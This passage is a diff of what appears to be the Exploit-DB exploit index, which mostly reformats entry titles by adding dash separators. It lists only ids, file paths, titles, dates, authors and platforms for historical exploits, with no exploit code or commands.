17771,platforms/php/webapps/17771.txt,"WordPress VideoWhisper Video Presentation plugin <= 1.1 - SQL Injection Vulnerability",2011-09-02,"Miroslav Stampar",php,webapps,0 17772,platforms/windows/dos/17772.txt,"BroadWin WebAccess Client - Multiple Vulnerabilities",2011-09-02,"Luigi Auriemma",windows,dos,0 17773,platforms/php/webapps/17773.txt,"WordPress Facebook Opengraph Meta Plugin plugin <= 1.0 - SQL Injection Vulnerability",2011-09-03,"Miroslav Stampar",php,webapps,0 @@ -15554,7 +15554,7 @@ id,file,description,date,author,platform,type,port 17897,platforms/jsp/webapps/17897.txt,"Omnidocs - Multiple Vulnerabilities",2011-09-27,"Sohil Garg",jsp,webapps,0 17900,platforms/asp/webapps/17900.txt,"timelive time and expense tracking 4.1.1 - Multiple Vulnerabilities",2011-09-28,"Nathaniel Carew",asp,webapps,0 17898,platforms/php/webapps/17898.txt,"redmind Online-Shop / E-Commerce-System SQL Injection Vulnerability",2011-09-27,"Indonesian BlackCoder",php,webapps,0 -17901,platforms/osx/dos/17901.c,"Mac OS X < 10.6.7 Kernel Panic Exploit",2011-09-28,hkpco,osx,dos,0 +17901,platforms/osx/dos/17901.c,"Mac OS X < 10.6.7 - Kernel Panic Exploit",2011-09-28,hkpco,osx,dos,0 17902,platforms/windows/local/17902.c,"Norman Security Suite 8 - (nprosec.sys) Local Privilege Escalation (0day)",2011-09-28,Xst3nZ,windows,local,0 17903,platforms/windows/dos/17903.txt,"NCSS <= 07.1.21 Array Overflow with Write2",2011-09-29,"Luigi Auriemma",windows,dos,0 17904,platforms/windows/remote/17904.rb,"ScriptFTP 3.3 - Remote Buffer Overflow (Metasploit)",2011-09-29,otoy,windows,remote,0 @@ -15691,14 +15691,14 @@ id,file,description,date,author,platform,type,port 18061,platforms/hardware/webapps/18061.txt,"ZTE ZXDSL 831IIV7.5.0a_Z29_OV Multiple Vulnerabilities",2011-11-01,"mehdi boukazoula",hardware,webapps,0 18062,platforms/windows/remote/18062.txt,"Oracle Hyperion Financial Management TList6 - ActiveX Control Remote Code Execution",2011-11-02,rgod,windows,remote,0 18063,platforms/php/webapps/18063.txt,"BST - BestShopPro (nowosci.php) Multiple Vulnerabilities",2011-11-02,CoBRa_21,php,webapps,0 -18064,platforms/linux/local/18064.sh,"Calibre E-Book Reader Local Root Exploit",2011-11-02,zx2c4,linux,local,0 +18064,platforms/linux/local/18064.sh,"Calibre E-Book Reader - Local Root Exploit (1)",2011-11-02,zx2c4,linux,local,0 18065,platforms/php/webapps/18065.txt,"SetSeed CMS 5.8.20 (loggedInUser) Remote SQL Injection Vulnerability",2011-11-02,LiquidWorm,php,webapps,0 18066,platforms/php/webapps/18066.txt,"CaupoShop Pro (2.x/ <= 3.70) Classic 3.01 - Local File Include Vulnerability",2011-11-02,"Rami Salama",php,webapps,0 18067,platforms/windows/local/18067.txt,"Microsoft Excel 2007 SP2 - Buffer Overwrite Exploit",2011-11-02,Abysssec,windows,local,0 18069,platforms/php/webapps/18069.txt,"Jara 1.6 - Multiple Vulnerabilities",2011-11-03,Or4nG.M4N,php,webapps,0 18070,platforms/php/webapps/18070.txt,"Web File Browser 0.4b14 File Download Vulnerability",2011-11-03,"Sangyun YOO",php,webapps,0 -18071,platforms/linux/local/18071.sh,"Calibre E-Book Reader Local Root Exploit",2011-11-03,zx2c4,linux,local,0 -18072,platforms/linux/local/18072.sh,"Calibre E-Book Reader Local Root Race Condition Exploit",2011-11-03,zx2c4,linux,local,0 +18071,platforms/linux/local/18071.sh,"Calibre E-Book Reader - Local Root Exploit (2)",2011-11-03,zx2c4,linux,local,0 +18072,platforms/linux/local/18072.sh,"Calibre E-Book Reader - Local Root Race Condition Exploit",2011-11-03,zx2c4,linux,local,0 18075,platforms/php/webapps/18075.txt,"Ajax File and Image Manager 1.0 Final - Remote Code Execution Vulnerability",2011-11-04,EgiX,php,webapps,0 18076,platforms/php/webapps/18076.txt,"Advanced Poll 2.02 SQL Injection Vulnerability",2011-11-04,"Yassin Aboukir",php,webapps,0 18077,platforms/windows/webapps/18077.txt,"hp data protector media operations <= 6.20 - Directory Traversal",2011-11-04,"Luigi Auriemma",windows,webapps,0 @@ -15710,7 +15710,7 @@ id,file,description,date,author,platform,type,port 18083,platforms/php/webapps/18083.php,"Zenphoto <= 1.4.1.4 - (ajax_create_folder.php) Remote Code Execution",2011-11-05,EgiX,php,webapps,0 18084,platforms/php/webapps/18084.php,"phpMyFAQ <= 2.7.0 (ajax_create_folder.php) Remote Code Execution",2011-11-05,EgiX,php,webapps,0 18085,platforms/php/webapps/18085.php,"aidiCMS 3.55 - (ajax_create_folder.php) Remote Code Execution",2011-11-05,EgiX,php,webapps,0 -18086,platforms/linux/local/18086.c,"Calibre E-Book Reader Local Root",2011-11-05,zx2c4,linux,local,0 +18086,platforms/linux/local/18086.c,"Calibre E-Book Reader - Local Root",2011-11-05,zx2c4,linux,local,0 18087,platforms/windows/local/18087.rb,"Microsoft Office 2007 Excel .xlb Buffer Overflow (MS11-021)",2011-11-05,metasploit,windows,local,0 18088,platforms/php/webapps/18088.txt,"WHMCompleteSolution 3.x/4.x - Multiple Vulnerabilities",2011-11-07,ZxH-Labs,php,webapps,0 18089,platforms/windows/remote/18089.rb,"KnFTP 1.0 - Buffer Overflow Exploit - DEP Bypass",2011-11-07,pasta,windows,remote,0 @@ -16352,7 +16352,7 @@ id,file,description,date,author,platform,type,port 18903,platforms/windows/dos/18903.rb,"DVD-Lab Studio 1.25 DAL File Open Crash",2012-05-21,"Ahmed Elhady Mohamed",windows,dos,0 18910,platforms/php/dos/18910.php,"PHP <= 5.4.3 (com_event_sink) Denial of Service",2012-05-21,condis,php,dos,0 18911,platforms/php/webapps/18911.txt,"Vanilla Forums About Me Plugin Persistant XSS",2012-05-21,"Henry Hoggard",php,webapps,0 -18912,platforms/php/webapps/18912.txt,"Vanilla FirstLastNames 1.3.2 Plugin Persistant XSS",2012-05-21,"Henry Hoggard",php,webapps,0 +18912,platforms/php/webapps/18912.txt,"Vanilla FirstLastNames 1.3.2 Plugin - Persistant XSS",2012-05-21,"Henry Hoggard",php,webapps,0 18913,platforms/php/webapps/18913.php,"Supernews <= 2.6.1 - SQL Injection Exploit",2012-05-21,WhiteCollarGroup,php,webapps,0 18905,platforms/windows/local/18905.rb,"Foxit Reader 3.0 Open Execute Action Stack Based Buffer Overflow",2012-05-21,metasploit,windows,local,0 18914,platforms/windows/local/18914.py,"Novell Client 4.91 SP4 - Privilege Escalation Exploit",2012-05-22,sickness,windows,local,0 @@ -16437,7 +16437,7 @@ id,file,description,date,author,platform,type,port 19021,platforms/php/webapps/19021.txt,"WordPress Thinkun Remind Plugin 1.1.3 - Remote File Disclosure",2012-06-08,"Sammy FORGIT",php,webapps,0 19022,platforms/php/webapps/19022.txt,"WordPress Tinymce Thumbnail Gallery Plugin 1.0.7 - Remote File Disclosure",2012-06-08,"Sammy FORGIT",php,webapps,0 19023,platforms/php/webapps/19023.php,"WordPress wpStoreCart Plugin 2.5.27-2.5.29 - Arbitrary File Upload",2012-06-08,"Sammy FORGIT",php,webapps,0 -19011,platforms/php/webapps/19011.txt,"Webspell FIRSTBORN Movie-Addon Blind SQL Injection Vulnerability",2012-06-08,"Easy Laster",php,webapps,0 +19011,platforms/php/webapps/19011.txt,"Webspell FIRSTBORN Movie-Addon - Blind SQL Injection Vulnerability",2012-06-08,"Easy Laster",php,webapps,0 19028,platforms/linux/remote/19028.txt,"Berkeley Sendmail 5.58 DEBUG Vulnerability",1988-08-01,anonymous,linux,remote,0 19031,platforms/php/webapps/19031.txt,"Webspell dailyinput Movie Addon 4.2.x SQL Injection Vulnerability",2012-06-10,"Easy Laster",php,webapps,0 19033,platforms/windows/remote/19033.txt,"Microsoft iis 6.0 and 7.5 - Multiple Vulnerabilities",2012-06-10,kingcope,windows,remote,0 @@ -16489,7 +16489,7 @@ id,file,description,date,author,platform,type,port 19082,platforms/linux/dos/19082.txt,"AMD K6 Processor Vulnerability",1998-06-01,Poulot-Cazajous,linux,dos,0 19083,platforms/windows/remote/19083.cpp,"Cheyenne Inoculan for Windows NT 4.0 Share Vulnerability",1998-06-10,"Paul Boyer",windows,remote,0 19084,platforms/multiple/remote/19084.txt,"Metainfo Sendmail 2.0/2.5 & MetaIP 3.1",1998-06-30,"Jeff Forristal",multiple,remote,0 -19085,platforms/linux/dos/19085.c,"Linux kernel 2.0/2.1 SIGIO Vulnerability",1998-06-30,"David Luyer",linux,dos,0 +19085,platforms/linux/dos/19085.c,"Linux kernel 2.0/2.1 - SIGIO Vulnerability",1998-06-30,"David Luyer",linux,dos,0 19086,platforms/linux/remote/19086.c,"wu-ftpd 2.4.2 & SCO Open Server <= 5.0.5 & ProFTPD 1.2 pre1 - realpath Vulnerability (1)",1999-02-09,"smiler and cossack",linux,remote,21 19087,platforms/linux/remote/19087.c,"wu-ftpd 2.4.2 & SCO Open Server <= 5.0.5 & ProFTPD 1.2 pre1 - realpath Vulnerability (2)",1999-02-09,"jamez and c0nd0r",linux,remote,21 19089,platforms/windows/dos/19089.txt,"Windows OpenType Font - File Format DoS Exploit",2012-06-12,Cr4sh,windows,dos,0 @@ -16518,12 +16518,12 @@ id,file,description,date,author,platform,type,port 19113,platforms/windows/remote/19113.txt,"Microsoft Windows NT 3.5.1 SP2/3.5.1 SP3/3.5.1 SP4/3.5.1 SP5/4.0/4.0 SP1/4.0 SP2/4.0 SP3/4.0 SP4/4.0 SP5 Telnetd Vulnerability",1999-01-02,"Tomas Halgas",windows,remote,23 19386,platforms/php/webapps/19386.txt,"UCCASS <= 1.8.1 - Blind SQL Injection Vulnerability",2012-06-24,dun,php,webapps,0 19385,platforms/windows/dos/19385.txt,"IrfanView 4.33 DJVU Image Processing Heap Overflow",2012-06-24,"Francis Provencher",windows,dos,0 -19117,platforms/linux/remote/19117.c,"Digital UNIX <= 4.0 D_FreeBSD <= 2.2.4_HP HP-UX 10.20/11.0_IBM AIX <= 3.2.5_Linux kernel 2.0/2.1_NetBSD 1.2_Solaris <= 2.5.1 Smurf Denial of Service Vulnerability",1998-01-05,"T. Freak",linux,remote,0 +19117,platforms/linux/remote/19117.c,"Digital UNIX <= 4.0 D_FreeBSD <= 2.2.4_HP HP-UX 10.20/11.0_IBM AIX <= 3.2.5_Linux kernel 2.0/2.1_NetBSD 1.2_Solaris <= 2.5.1 - Smurf Denial of Service Vulnerability",1998-01-05,"T. Freak",linux,remote,0 19118,platforms/multiple/remote/19118.txt,"Microsoft IIS 3.0/4.0_Microsoft Personal Web Server 2.0/3.0/4.0 ASP Alternate Data Streams Vulnerability",1998-01-01,"Paul Ashton",multiple,remote,0 19119,platforms/linux/remote/19119.c,"HP HP-UX <= 10.34 rlpdaemon Vulnerability",1998-07-06,"RSI Advise",linux,remote,0 19120,platforms/multiple/remote/19120.txt,"Ralf S. Engelschall ePerl 2.2.12 Handling of ISINDEX Query Vulnerability",1998-07-06,"Luz Pinto",multiple,remote,0 19121,platforms/multiple/remote/19121.txt,"Ray Chan WWW Authorization Gateway 0.1 Vulnerability",1998-07-08,"Albert Nubdy",multiple,remote,0 -19122,platforms/linux/local/19122.txt,"Slackware Linux <= 3.5 /etc/group missing results in Root access Vulnerability",1998-07-13,"Richard Thomas",linux,local,0 +19122,platforms/linux/local/19122.txt,"Slackware Linux <= 3.5 - /etc/group missing results in Root access Vulnerability",1998-07-13,"Richard Thomas",linux,local,0 19123,platforms/linux/remote/19123.c,"SCO Open Server <= 5.0.4 POP Server Buffer Overflow Vulnerability",1998-07-13,"Vit Andrusevich",linux,remote,0 19124,platforms/linux/remote/19124.txt,"HP JetAdmin 1.0.9 Rev. D symlink Vulnerability",1998-07-15,emffmmadffsdf,linux,remote,0 19125,platforms/linux/local/19125.txt,"Oracle 8 oratclsh Suid Vulnerability",1999-04-29,"Dan Sugalski",linux,local,0 @@ -16640,7 +16640,7 @@ id,file,description,date,author,platform,type,port 19247,platforms/linux/remote/19247.c,"Microsoft IIS 4.0 - Buffer Overflow Vulnerability (3)",1999-06-15,"eeye security",linux,remote,0 19248,platforms/windows/remote/19248.c,"Microsoft IIS 4.0 - Buffer Overflow Vulnerability (4)",1999-06-15,"Greg Hoglund",windows,remote,0 19249,platforms/linux/local/19249.c,"Xcmail 0.99.6 Vulnerability",1999-03-02,Arthur,linux,local,0 -19250,platforms/linux/local/19250.txt,"Linux kernel 2.0/2.1/2.2 autofs Vulnerability",1999-02-19,"Brian Jones",linux,local,0 +19250,platforms/linux/local/19250.txt,"Linux kernel 2.0/2.1/2.2 - autofs Vulnerability",1999-02-19,"Brian Jones",linux,local,0 19251,platforms/linux/remote/19251.c,"tcpdump 3.4 Protocol Four and Zero Header Length Vulnerability",1999-06-16,badi,linux,remote,0 19401,platforms/windows/local/19401.txt,"quicktime.util.QTByteObject Initialization Security Checks Bypass",2012-06-26,"Security Explorations",windows,local,0 19253,platforms/linux/remote/19253.txt,"Debian Linux 2.1 - httpd Vulnerability",1999-06-17,anonymous,linux,remote,0 @@ -16661,8 +16661,8 @@ id,file,description,date,author,platform,type,port 19268,platforms/irix/local/19268.txt,"SGI IRIX 5.3 Cadmin Vulnerabilities",1996-08-06,"Grant Kaufmann",irix,local,0 19269,platforms/irix/local/19269.txt,"SGI IRIX <= 6.0.1 colorview Vulnerability",1995-02-09,"Dave Sill",irix,local,0 19270,platforms/linux/local/19270.c,"Debian Linux 2.0 - Super Syslog Buffer Overflow Vulnerability",1999-02-25,c0nd0r,linux,local,0 -19271,platforms/linux/dos/19271.c,"Linux kernel 2.0 TCP Port DoS Vulnerability",1999-01-19,"David Schwartz",linux,dos,0 -19272,platforms/linux/local/19272.txt,"Linux kernel 2.2 ldd core Vulnerability",1999-01-26,"Dan Burcaw",linux,local,0 +19271,platforms/linux/dos/19271.c,"Linux kernel 2.0 - TCP Port DoS Vulnerability",1999-01-19,"David Schwartz",linux,dos,0 +19272,platforms/linux/local/19272.txt,"Linux kernel 2.2 - ldd core Vulnerability",1999-01-26,"Dan Burcaw",linux,local,0 19273,platforms/irix/local/19273.sh,"SGI IRIX 6.2 - day5notifier Vulnerability",1997-05-16,"Mike Neuman",irix,local,0 19274,platforms/irix/local/19274.c,"SGI IRIX <= 6.3 df Vulnerability",1997-05-24,"David Hedley",irix,local,0 19275,platforms/irix/local/19275.c,"SGI IRIX <= 6.4 datman/cdman Vulnerability",1996-12-09,"Yuri Volobuev",irix,local,0 @@ -16692,14 +16692,14 @@ id,file,description,date,author,platform,type,port 19298,platforms/multiple/remote/19298.txt,"SGI IRIX 6.2 cgi-bin wrap Vulnerability",1997-04-19,"J.A. Gutierrez",multiple,remote,0 19299,platforms/multiple/remote/19299.txt,"SGI IRIX <= 6.3 cgi-bin webdist.cgi Vulnerabilty",1997-05-06,anonymous,multiple,remote,0 19300,platforms/aix/local/19300.txt,"IBM AIX <= 4.2.1 snap Insecure Temporary File Creation Vulnerability",1999-02-17,"Larry W. Cashdollar",aix,local,0 -19301,platforms/linux/remote/19301.c,"Linux kernel 2.0.33 IP Fragment Overlap Vulnerability",1998-04-17,"Michal Zalewski",linux,remote,0 +19301,platforms/linux/remote/19301.c,"Linux kernel 2.0.33 - IP Fragment Overlap Vulnerability",1998-04-17,"Michal Zalewski",linux,remote,0 19302,platforms/linux/local/19302.c,"Linux libc 5.3.12 / RedHat Linux 4.0 / Slackware Linux 3.1 - libc NLSPATH Vulnerability",1998-01-19,Solar,linux,local,0 19303,platforms/multiple/remote/19303.txt,"SGI IRIX <= 6.4 cgi-bin handler Vulnerability",1997-06-16,"Razvan Dragomirescu",multiple,remote,0 19304,platforms/irix/local/19304.txt,"SGI IRIX <= 6.4 inpview Vulnerability",1997-05-07,"Yuri Volobuev",irix,local,0 19305,platforms/linux/local/19305.c,"RedHat Linux 5.0 msgchk Vulnerability",1998-01-19,"Cesar Tascon Alvarez",linux,local,0 19306,platforms/aix/local/19306.c,"IBM AIX 4.2.1 portmir Buffer Overflow & Insecure Temporary File Creation Vulnerabilities",1997-10-29,"BM ERS Team",aix,local,0 19307,platforms/aix/local/19307.c,"IBM AIX <= 4.2 ping Buffer Overflow Vulnerability",1997-07-21,"Bryan P. Self",aix,local,0 -19308,platforms/linux/local/19308.c,"Linux kernel 2.0/2.0.33 i_count Overflow Vulnerability",1998-01-14,"Aleph One",linux,local,0 +19308,platforms/linux/local/19308.c,"Linux kernel 2.0/2.0.33 - i_count Overflow Vulnerability",1998-01-14,"Aleph One",linux,local,0 19309,platforms/aix/local/19309.c,"IBM AIX <= 4.2 lchangelv Buffer Overflow Vulnerability",1997-07-21,"Bryan P. Self",aix,local,0 19310,platforms/irix/local/19310.c,"SGI IRIX <= 6.4 login Vulnerability",1997-05-26,"David Hedley",irix,local,0 19311,platforms/linux/local/19311.c,"RedHat Linux 4.2_SGI IRIX <= 6.3_Solaris <= 2.6 mailx Vulnerability (1)",1998-06-20,"Alvaro Martinez Echevarria",linux,local,0 @@ -16787,11 +16787,11 @@ id,file,description,date,author,platform,type,port 19416,platforms/windows/dos/19416.c,"Netscape Enterprise Server <= 3.6 SSL Buffer Overflow DoS Vulnerability",1999-07-06,"Arne Vidstrom",windows,dos,0 19417,platforms/osx/local/19417.txt,"Apple Mac OS <= 8 8.6 Weak Password Encryption Vulnerability",1999-07-10,"Dawid adix Adamski",osx,local,0 19418,platforms/aix/local/19418.txt,"IBM AIX <= 4.3.1 adb Vulnerability",1999-07-12,"GZ Apple",aix,local,0 -19419,platforms/linux/local/19419.c,"Linux kernel 2.0.37 Segment Limit Vulnerability",1999-07-13,Solar,linux,local,0 +19419,platforms/linux/local/19419.c,"Linux kernel 2.0.37 - Segment Limit Vulnerability",1999-07-13,Solar,linux,local,0 19420,platforms/multiple/remote/19420.c,"Caldera OpenUnix 8.0/UnixWare 7.1.1_HP HP-UX <= 11.0_Solaris <= 7.0_SunOS <= 4.1.4 rpc.cmsd Buffer Overflow Vulnerability (1)",1999-07-13,"Last Stage of Delirium",multiple,remote,0 19421,platforms/multiple/remote/19421.c,"Caldera OpenUnix 8.0/UnixWare 7.1.1_HP HP-UX <= 11.0_Solaris <= 7.0_SunOS <= 4.1.4 rpc.cmsd Buffer Overflow Vulnerability (2)",1999-07-13,jGgM,multiple,remote,0 19422,platforms/linux/local/19422.txt,"BMC Software Patrol <= 3.2.5 Patrol SNMP Agent File Creation/Permission Vulnerability",1999-07-14,"Andrew Alness",linux,local,0 -19423,platforms/multiple/dos/19423.c,"BSD/OS <= 4.0_FreeBSD <= 3.2_Linux kernel <= 2.3_NetBSD <= 1.4 Shared Memory Denial of Service Vulnerability",1999-07-15,"Mike Perry",multiple,dos,0 +19423,platforms/multiple/dos/19423.c,"BSD/OS <= 4.0_FreeBSD <= 3.2_Linux kernel <= 2.3_NetBSD <= 1.4 - Shared Memory Denial of Service Vulnerability",1999-07-15,"Mike Perry",multiple,dos,0 19424,platforms/windows/remote/19424.pl,"Microsoft Data Access Components (MDAC) <= 2.1_Microsoft IIS 3.0/4.0_Microsoft Index Server 2.0_Microsoft Site Server Commerce Edition 3.0 i386 MDAC RDS Vulnerability (1)",1999-07-19,"rain forest puppy",windows,remote,0 19425,platforms/windows/local/19425.txt,"Microsoft Data Access Components (MDAC) <= 2.1_Microsoft IIS 3.0/4.0_Microsoft Index Server 2.0_Microsoft Site Server Commerce Edition 3.0 i386 MDAC RDS Vulnerability (2)",1999-07-19,"Wanderley J. Abreu Jr",windows,local,0 19426,platforms/multiple/remote/19426.c,"SGI Advanced Linux Environment 3.0_SGI IRIX <= 6.5.4_SGI UNICOS <= 10.0 6 arrayd.auth Default Configuration Vulnerability",1999-07-19,"Last Stage of Delirium",multiple,remote,0 @@ -16889,7 +16889,7 @@ id,file,description,date,author,platform,type,port 19519,platforms/windows/local/19519.rb,"Irfanview JPEG2000 <= 4.3.2.0 - jp2 - Stack Buffer Overflow",2012-07-01,metasploit,windows,local,0 19520,platforms/bsd/remote/19520.txt,"BSD telnetd Remote Root Exploit",2012-07-01,kingcope,bsd,remote,0 19521,platforms/windows/remote/19521.txt,"Microsoft Internet Explorer 5.0/4.0.1 hhopen OLE Control Buffer Overflow Vulnerability",1999-09-27,"Shane Hird",windows,remote,0 -19522,platforms/linux/remote/19522.txt,"Linux kernel 2.2 Predictable TCP Initial Sequence Number Vulnerability",1999-09-27,"Stealth and S. Krahmer",linux,remote,0 +19522,platforms/linux/remote/19522.txt,"Linux kernel 2.2 - Predictable TCP Initial Sequence Number Vulnerability",1999-09-27,"Stealth and S. Krahmer",linux,remote,0 19523,platforms/linux/local/19523.txt,"python-wrapper Untrusted Search Path/Code Execution Vulnerability",2012-07-02,ShadowHatesYou,linux,local,0 19524,platforms/php/webapps/19524.txt,"WordPress Backup Plugin 2.0.1 - Information Disclosure",2012-07-02,"Stephan Knauss",php,webapps,0 19525,platforms/windows/webapps/19525.txt,"IIS Short File/Folder Name Disclosure",2012-07-02,"Soroush Dalili",windows,webapps,0 @@ -16947,7 +16947,7 @@ id,file,description,date,author,platform,type,port 19578,platforms/windows/dos/19578.txt,"Microsoft Windows NT 4.0/SP1/SP2/SP3/SP4/SP5/SP6 - Services.exe Denial of Service (2)",1999-10-31,.rain.forest.puppy,windows,dos,0 19673,platforms/windows/local/19673.txt,"Microsoft Windows 95/98/NT 4.0 Help File Trojan Vulnerability",1999-12-10,"Pauli Ojanpera",windows,local,0 19674,platforms/sco/local/19674.c,"SCO Unixware 7.0/7.0.1/7.1/7.1.1 - Privileged Program Debugging Vulnerability",1999-12-10,"Brock Tellier",sco,local,0 -19675,platforms/linux/local/19675.c,"Debian 2.1_Linux kernel 2.0.x_RedHat 5.2 Packet Length with Options Vulnerability",1999-12-08,"Andrea Arcangeli",linux,local,0 +19675,platforms/linux/local/19675.c,"Debian 2.1_Linux kernel 2.0.x_RedHat 5.2 - Packet Length with Options Vulnerability",1999-12-08,"Andrea Arcangeli",linux,local,0 19676,platforms/freebsd/local/19676.c,"FreeBSD 3.3_Linux Mandrake 7.0 - 'xsoldier' Buffer Overflow Vulnerability (1)",2000-05-17,"Brock Tellier",freebsd,local,0 19677,platforms/linux/local/19677.c,"FreeBSD 3.3_Linux Mandrake 7.0 - 'xsoldier' Buffer Overflow Vulnerability (2)",2000-05-17,"Larry W. Cashdollar",linux,local,0 19580,platforms/windows/remote/19580.txt,"Avirt Gateway Suite 3.3 a/3.5 Mail Server Buffer Overflow (1)",1999-10-31,"Luck Martins",windows,remote,0 @@ -17560,7 +17560,7 @@ id,file,description,date,author,platform,type,port 20223,platforms/windows/remote/20223.txt,"Sambar Server 4.3/4.4 beta 3 - Search CGI Vulnerability",2000-09-15,dethy,windows,remote,0 20224,platforms/windows/remote/20224.txt,"CamShot WebCam 2.6 Trial - Remote Buffer Overflow",2000-09-15,SecuriTeam,windows,remote,0 20225,platforms/windows/dos/20225.pl,"Alt-N MDaemon 3.1.1 - DoS Vulnerability",1999-12-01,"Ussr Labs",windows,dos,0 -20226,platforms/freebsd/dos/20226.c,"FreeBSD Kernel SCTP Remote NULL Ptr Dereference DoS",2012-08-03,"Shaun Colley",freebsd,dos,0 +20226,platforms/freebsd/dos/20226.c,"FreeBSD Kernel - SCTP Remote NULL Ptr Dereference DoS",2012-08-03,"Shaun Colley",freebsd,dos,0 20542,platforms/windows/local/20542.rb,"globalSCAPE CuteZIP Stack Buffer Overflow",2012-08-15,metasploit,windows,local,0 20228,platforms/windows/dos/20228.pl,"TYPSoft 0.7 x FTP Server Remote DoS Vulnerability",1999-06-08,dethy,windows,dos,0 20229,platforms/multiple/dos/20229.txt,"IBM Websphere Application Server 3.0.2 Server Plugin DoS Vulnerability",2000-09-15,"Rude Yak",multiple,dos,0 @@ -17786,7 +17786,7 @@ id,file,description,date,author,platform,type,port 20455,platforms/aix/local/20455.c,"IBM AIX 4.3.x piobe Buffer Overflow Vulnerability",2000-12-01,"Last Stage of Delirium",aix,local,0 20456,platforms/windows/local/20456.c,"Microsoft SQL Server 7.0/2000_Data Engine 1.0/2000 xp_showcolv Buffer Overflow Vulnerability",2000-12-01,"David Litchfield",windows,local,0 20457,platforms/windows/local/20457.c,"Microsoft SQL Server 7.0/2000_Data Engine 1.0/2000 xp_peekqueue Buffer Overflow Vulnerability",2000-12-01,@stake,windows,local,0 -20458,platforms/linux/local/20458.txt,"Linux Kernel 2.2.x Non-Readable File Ptrace Vulnerability",2000-11-30,"Lamagra Argamal",linux,local,0 +20458,platforms/linux/local/20458.txt,"Linux Kernel 2.2.x - Non-Readable File Ptrace Vulnerability",2000-11-30,"Lamagra Argamal",linux,local,0 20459,platforms/windows/remote/20459.html,"Microsoft Internet Explorer 5 \'INPUT TYPE=FILE\' Vulnerability",2000-12-01,Key,windows,remote,0 20460,platforms/windows/remote/20460.txt,"Microsoft Windows NT 4.0 PhoneBook Server Buffer Overflow",2000-12-04,"Alberto Solino",windows,remote,0 20461,platforms/windows/remote/20461.txt,"Serv-U 2.4/2.5 FTP Directory Traversal Vulnerability",2000-12-05,Zoa_Chien,windows,remote,0 @@ -17888,7 +17888,7 @@ id,file,description,date,author,platform,type,port 20563,platforms/unix/remote/20563.txt,"wu-ftpd 2.4.2/2.5 .0/2.6.0/2.6.1/2.6.2 - FTP Conversion Vulnerability",1999-12-20,suid,unix,remote,0 20564,platforms/windows/dos/20564.txt,"Microsoft Windows NT 4.0 SNMP-WINS DoS Vulnerability",1997-10-07,CRouland,windows,dos,0 20565,platforms/hardware/remote/20565.c,"HP JetDirect rev. G.08.x/rev. H.08.x/x.08.x/J3111A LCD Display Modification Vulnerability",1997-12-08,sili,hardware,remote,0 -20566,platforms/linux/dos/20566.c,"Linux kernel 2.1.89/2.2.x Zero-Length Fragment Vulnerability",1997-12-08,"John McDonald",linux,dos,0 +20566,platforms/linux/dos/20566.c,"Linux kernel 2.1.89/2.2.x - Zero-Length Fragment Vulnerability",1997-12-08,"John McDonald",linux,dos,0 20567,platforms/cgi/remote/20567.txt,"php php/fi 2.0 - Directory Traversal Vulnerability",1997-04-16,Shamanski,cgi,remote,0 20568,platforms/sco/remote/20568.txt,"Skunkware 2.0 view-source Directory Traversal Vulnerability",1997-04-16,myst,sco,remote,0 20569,platforms/linux/remote/20569.c,"mICQ 0.4.6 - Remote Buffer Overflow Vulnerability",2001-01-17,"tHE rECIdjVO",linux,remote,0 @@ -18072,7 +18072,7 @@ id,file,description,date,author,platform,type,port 20759,platforms/php/webapps/20759.txt,"letodms 3.3.6 - Multiple Vulnerabilities",2012-08-23,"Shai rod",php,webapps,0 20760,platforms/php/webapps/20760.txt,"op5 Monitoring 5.4.2 - (VM Applicance) Multiple Vulnerabilities",2012-08-23,loneferret,php,webapps,0 20764,platforms/solaris/remote/20764.txt,"Solaris 2.6 FTP Core Dump Shadow Password Recovery Vulnerability",2001-04-17,warning3,solaris,remote,0 -20765,platforms/linux/remote/20765.pl,"Linux kernel 2.4 IPTables FTP Stateful Inspection Arbitrary Filter Rule Insertion",2001-04-16,"Cristiano Lincoln Mattos",linux,remote,0 +20765,platforms/linux/remote/20765.pl,"Linux kernel 2.4 - IPTables FTP Stateful Inspection Arbitrary Filter Rule Insertion",2001-04-16,"Cristiano Lincoln Mattos",linux,remote,0 20766,platforms/unix/local/20766.c,"SGI IRIX 6.5_Solaris 7.0/8 CDE dtsession Buffer Overflow Vulnerability",2001-04-11,"Last Stage of Delirium",unix,local,0 20767,platforms/solaris/local/20767.c,"Solaris 2.5/2.6/7.0/8 kcms_configure KCMS_PROFILES Buffer Overflow Vulnerability (1)",1999-12-01,"Last Stage of Delirium",solaris,local,0 20768,platforms/solaris/local/20768.c,"Solaris 2.5/2.6/7.0/8 kcms_configure KCMS_PROFILES Buffer Overflow Vulnerability (2)",1999-12-01,"Last Stage of Delirium",solaris,local,0 @@ -18165,7 +18165,7 @@ id,file,description,date,author,platform,type,port 20856,platforms/php/webapps/20856.txt,"XWiki 4.2-milestone-2 - Multiple Stored XSS Vulnerabilities",2012-08-27,"Shai rod",php,webapps,0 20857,platforms/php/webapps/20857.txt,"web@all CMS 2.0 - Multiple Vulnerabilities",2012-08-27,LiquidWorm,php,webapps,0 20859,platforms/php/webapps/20859.txt,"vlinks 2.0.3 (site.php id parameter) SQL Injection",2012-08-27,JIKO,php,webapps,0 -20861,platforms/win64/local/20861.txt,"Microsoft Windows Kernel Intel x64 SYSRET PoC",2012-08-27,"Shahriyar Jalayeri",win64,local,0 +20861,platforms/win64/local/20861.txt,"Microsoft Windows Kernel - Intel x64 SYSRET PoC",2012-08-27,"Shahriyar Jalayeri",win64,local,0 20862,platforms/php/webapps/20862.txt,"WordPress Count per Day Plugin 3.2.3 - XSS Vulnerability",2012-08-27,Crim3R,php,webapps,0 20863,platforms/php/webapps/20863.txt,"xt:Commerce VEYTON 4.0.15 (products_name_de) Script Insertion Vulnerability",2012-08-27,LiquidWorm,php,webapps,0 20864,platforms/asp/webapps/20864.txt,"Elcom CMS 7.4.10 Community Manager Insecure File Upload",2012-08-27,"Sense of Security",asp,webapps,0 @@ -18250,7 +18250,7 @@ id,file,description,date,author,platform,type,port 20948,platforms/windows/remote/20948.txt,"1C: Arcadia Internet Store 1.0 Show Path Vulnerability",2001-06-21,ViperSV,windows,remote,0 20949,platforms/windows/dos/20949.c,"1C: Arcadia Internet Store 1.0 - Denial of Service Vulnerability",2001-06-21,"NERF Security",windows,dos,0 20950,platforms/windows/remote/20950.c,"Microsoft Visual Studio RAD Support Buffer Overflow Vulnerability",2001-06-21,"NSFOCUS Security Team",windows,remote,0 -20951,platforms/windows/remote/20951.pm,"Microsoft Visual Studio RAD Support Buffer Overflow Vulnerability (Metasploit",2001-06-21,"NSFOCUS Security Team",windows,remote,0 +20951,platforms/windows/remote/20951.pm,"Microsoft Visual Studio RAD 